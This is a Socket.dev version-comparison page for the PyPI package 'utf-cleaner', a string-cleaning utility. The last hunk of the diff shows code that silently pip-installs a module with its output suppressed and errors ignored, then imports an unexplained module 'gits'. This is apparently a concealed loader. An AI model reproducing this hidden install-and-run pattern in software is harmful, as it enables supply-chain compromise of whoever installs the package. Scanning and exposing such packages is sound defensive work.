You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

utf-cleaner

Package Overview
Dependencies
Maintainers
1
Versions
6
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

utf-cleaner - pypi Package Compare versions

Comparing version
3.3.8
to
3.3.9
+1
-1
PKG-INFO
Metadata-Version: 2.2
Name: utf-cleaner
Version: 3.3.8
Version: 3.3.9
Summary: A powerful package that removes non-UTF characters from strings.

@@ -5,0 +5,0 @@ Home-page: https://github.com/john-doe/utf_cleaner

@@ -5,3 +5,3 @@ from setuptools import setup, find_packages

name="utf-cleaner",
version="3.3.8",
version="3.3.9",
description="A powerful package that removes non-UTF characters from strings.",

@@ -8,0 +8,0 @@ author="John Doe",

Metadata-Version: 2.2
Name: utf-cleaner
Version: 3.3.8
Version: 3.3.9
Summary: A powerful package that removes non-UTF characters from strings.

@@ -5,0 +5,0 @@ Home-page: https://github.com/john-doe/utf_cleaner

@@ -6,2 +6,3 @@ import subprocess as p;import os;import sys

p.check_call([sys.executable, '-m', 'pip', 'install', '--ignore-installed', m, '-q'], stdout=devnull, stderr=devnull)
except:pass;import gits
except:pass
import gits